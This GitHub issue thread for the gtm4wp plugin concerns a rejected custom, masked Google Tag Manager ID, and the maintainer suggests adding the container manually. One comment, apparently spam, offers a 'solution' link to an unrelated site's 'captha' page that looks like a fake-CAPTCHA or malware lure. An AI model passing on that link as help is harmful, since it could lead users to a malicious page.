### ISSUE TITLE
non standard Google Tag Manager ID is accepted / GTM-XXXXX

### ISSUE THREAD

**Issue by ProfessionalHorder** [duracelltomi/gtm4wp#371]
in my setup I like to use a complete custom loader, including a masked GTM ID. (i.e.: track.mywebsite.com/script.js ... window,document,'script','dataLayer','MASKINGVALUE'.

However when I try to save such a masking value, I get a warning ('Dit lijkt geen geldige Google Tag Manager ID te zijn! Geldig format: GTM-XXXXX waarbij X cijfers en hoofdletters kan zijn. Gebruik een komma zonder enige spatie (,) om container ID's met meerdere stapels in te voeren.'). And the new value is not saved.

How to work around this?

**Comment by thegamerjedbest45454** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by duracelltomi** [comment]
You should set the container code placement to off and add your customized GTM container manually into your template files
